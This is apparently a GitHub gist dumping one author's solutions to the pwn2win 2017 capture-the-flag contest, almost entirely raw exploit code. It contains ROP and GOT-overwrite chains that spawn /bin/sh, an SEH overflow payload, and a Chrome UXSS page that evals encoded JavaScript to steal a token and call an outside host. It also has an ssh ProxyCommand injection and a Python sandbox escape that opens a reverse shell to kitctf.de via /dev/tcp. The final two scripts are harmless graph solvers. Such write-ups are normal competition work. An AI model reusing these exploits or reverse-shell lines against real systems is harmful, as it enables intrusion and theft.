Instantly share code, notes, and snippets.

@niklasb /0_wronguser.py Secret
Last active Oct 22, 2017

Embed
What would you like to do?
pwn2win 2017 solution dump
from pwnlib.tools import * # https://github.com/niklasb/ctf-tools
connect()
ru('name?\n')
pop_rdi = 0x004007f3
pop_rsi_r15=0x4007f1
puts=0x400570
fflush=0x4005d0
fgets=0x4005b0
rbp = 0x600ba0
rop = ''
rop += p64(pop_rdi)
rop += p64(0x600b98)
rop += p64(puts)
rop += p64(pop_rdi)
rop += p64(0)
rop += p64(fflush)
rop += p64(0x400743)
assert not '\n' in rop
sendln('a'*32+p64(rbp)+rop)
libc = u64(readln()[-6:]+'\0\0')-0x7ffff7a7aad0+0x00007ffff7a0d000
info('libc @ %p', libc)
stage2 = ''
stage2 += p64(0x424242424242)
stage2 += p64(0x400780)
stage2 += 'F'*16
stage2 += p64(0x600ba0)
stage2 += p64(libc+0x21102) # pop rdi
stage2 += p64(1337)
stage2 += p64(libc+0x000202e8) # pop rsi
stage2 += p64(1337)
stage2 += p64(libc+0x0001b92) # pop rdx
stage2 += p64(1337)
stage2 +=p64(libc+0xcd570) # setresuid
stage2 += p64(libc+0x21102) # pop rdi
stage2 += p64(libc+0x18cd17) # "/bin/sh"
stage2 += p64(libc+0x45390) # system
stage2 += 'G'*(0x400-len(stage2))
assert not '\n' in stage2
sendln(stage2)
interact()
from pwnlib.tools import * # https://github.com/niklasb/ctf-tools
# Run until you get a shell. Should work in 1/16 tries (4 bits are guessed)
connect()
ru('Exit with ".".\n')
pop3=0x080486ad
store=0x80484FB
got=0x8049900
plt=0x80483A0
popebp=0x08048510
nl=0x80486E1
def write(addr, val):
return [store, pop3, addr, 0, val]
rop = []
rop += write(got-2, 0xd1404343) # puts
rop += [plt, popebp, got]
rop += write(got-2, 0xb3304343) # fflush
rop += [plt, popebp, 0]
rop += write(got-2, 0xc8904343) # gets
rop += [plt, popebp, 0x80498c8]
rop += [plt, popebp, got]
rop += [plt, popebp, 0x80498c8]
for i, x in enumerate(rop):
if x >= 2**31:
x-=2**32
send('%d\n%d\n'%(72+i, x))
sendln('.')
libc = u32(readn(4))-0xf7e7d140+0xf7e1e000
if libc&0xfff:
exit(1)
info('libc %p', libc)
system = libc+0x3a940
info('system %p', system)
sendln('/bin/sh;')
raw_input()
sendln(p32(system))
enjoy()
import struct
payload = 'A'*352
payload += struct.pack("<I",0x8011798)
payload += 'B'*(0x200-len(payload))
sys.stdout.write(payload)
# python2 seh.py | nc host port
<!DOCTYPE html>
<!-- UXSS 1day in Chrome:
https://bugs.chromium.org/p/chromium/issues/detail?id=668552
-->
<base href="javascript:top.f();//"></base>
<object name="privateScriptController"></object>
<object data="#"></object>
<script>
if (location.protocol == 'file:') {
throw alert('HTTP server is required.');
}
function f() {
document.getElementsByName('privateScriptController')[0].remove();
frames[0].document.documentElement.appendChild(c);
}
var i = document.documentElement.appendChild(document.createElement('iframe'));
var d = i.contentDocument;
i.remove();
var c = d.documentElement.appendChild(d.createElement('div'));
var m = c.appendChild(d.createElement('marquee'));
var i0 = c.appendChild(d.createElement('iframe'));
var i1 = c.appendChild(d.createElement('iframe'));
m.setAttribute('class', 'a');
document.adoptNode(c);
var code= (
'var x=new XMLHttpRequest();'+
'x.open("GET","http://careers.butcher.team/analysis/curriculums",false);'+
'x.send();'+
'var token=x.responseText.split("\'accept\',\'")[1].split("\'")[0];'+
'var y=new XMLHttpRequest();'+
'y.open("POST","http://careers.butcher.team/analysis/accept",false);'+
'y.setRequestHeader("Content-type", "application/json");'+
'y.send(JSON.stringify({token:token}));'+
'var z=new XMLHttpRequest();'+
'z.open("GET","http://dtun.de/done/",false);'+
'z.send();');
var payload = '';
for (var i = 0; i < code.length; ++i) {
if (i>0) payload += ',';
payload += code.charCodeAt(i);
}
console.log(payload);
i1.onload = function() {
try {
i1.contentDocument;
} catch(e) {
i1.onload = null;
i1.src = 'javascript:eval(String.fromCharCode('+payload+'))';
document.querySelector('base').remove();
document.documentElement.appendChild(document.createElement('iframe')).src = 's.svg';
}
}
i1.src = 'http://careers.butcher.team/analysis/curriculums';
</script>
<!-- This one is to delay the load. the server must listen, but not give a response! -->
<img src="http://dtun.de:4444/"/>
<!-- Also serve /s.svg:
<svg xmlns="http://www.w3.org/2000/svg">
<iframe xmlns="http://www.w3.org/1999/xhtml"></iframe>
<script>
frames[0].onunload = function() {
frames[0].frameElement.appendChild(top.c);
}
</script>
<element a="1" a="2" />
</svg>
-->
4
ssh://-oProxyCommand=sh<&2 /a
ls -alih>&2
cat flag.txt>&2
from pwnlib.tools import * #https://github.com/niklasb/ctf-tools
connect()
sendln(r'\D')
sendln(r'Revoke')
sendln(r'Op\en')
sendln(r'gen eval(Option())')
sendln(r'''raw_input([x for x in ().__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0].__enter__.__func__.__globals__['linecache'].checkcache.__globals__['os'].system('/bin/bash -c "sh >/dev/tcp/kitctf.de/5555 <&1 2>&1"'))''')
interact()
from sage.all import matrix, Integer, Rational
from scipy import linalg
from pwnlib.tools import * # https://github.com/niklasb/ctf-tools
import ssl
s=ssl.wrap_socket(connect())
while True:
queries = []
edges = {}
n=0
while True:
ln = map(int,readln(s).split())
if not ln:
break
if len(ln)==2:
queries.append(ln)
else:
assert not queries
x,y=min(ln[:2]),max(ln[:2])
if x == y:
continue
n=max(n,x)
n=max(n,y)
edges.setdefault((x,y),[])
edges[x,y].append(ln[2])
print "DONE READING %d %d %d" % (n, len(edges), len(queries))
L = [[0]*n for _ in range(n)]
seen = set()
for (x,y), ws in edges.items():
assert x != y
assert (x,y) not in seen and (y,x) not in seen
seen.add((x,y))
w = 1./sum(1./w for w in ws)
x-=1
y-=1
L[x][y] = L[y][x] = -1.0/w
for i in range(n):
L[i][i] = -sum(L[i])
L = matrix(L)
H = matrix(linalg.pinv(L))
for x, y in queries:
x-=1
y-=1
r=H[x,x]+H[y,y]-H[x,y]-H[y,x]
# print x, y, '%.3f'%r
sendln(s,'%.03f'%r)
interact()
from collections import defaultdict
import ssl
from pwnlib.tools import *
s=ssl.wrap_socket(connect())
# s=connect()
def solve(n, edges, queries):
par = {}
childs = defaultdict(list)
def find(x):
if par[x]==x:
return x
p=find(par[x])
par[x]=p
return p
def merge(x, y):
assert x != y and par[x]==x and par[y]==y
par[x]=y
childs[y].append(x)
def dfs(x):
yield x
for y in childs[x]:
for a in dfs(y):
yield a
edges=sorted(edges,key=lambda (x,y,w): w, reverse=True)
ans = [[-1]*n for _ in range(n)]
for i in range(n):
par[i]=i
seen=set()
for x, y, w in edges:
# print x, y, w
R=(min(x,y),max(x,y))
assert R not in seen
seen.add(R)
x=find(x)
y=find(y)
if x==y:
continue
A = list(dfs(x))
B = list(dfs(y))
for a in A:
for b in B:
assert ans[a][b]==-1
ans[a][b]=ans[b][a]=w
merge(x, y)
res = []
for x, y in queries:
assert x!=y
assert ans[x][y]!=-1
res.append(ans[x][y])
return res
while True:
queries = []
edges = []
n=0
while True:
ln = readln(s)
ln = map(int,ln.split())
if not ln:
break
ln[0]-=1
ln[1]-=1
assert ln[0]!=ln[1]
if len(ln)==2:send
queries.append(ln)
else:
assert not queries
n=max(n,ln[0]+1,ln[1]+1)
# print ln
edges.append(ln)
print "DONE READING %d %d %d" % (n, len(edges), len(queries))
res = solve(n, edges, queries)
send(s,'\n'.join('%d.0'%a for a in res))
interact()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment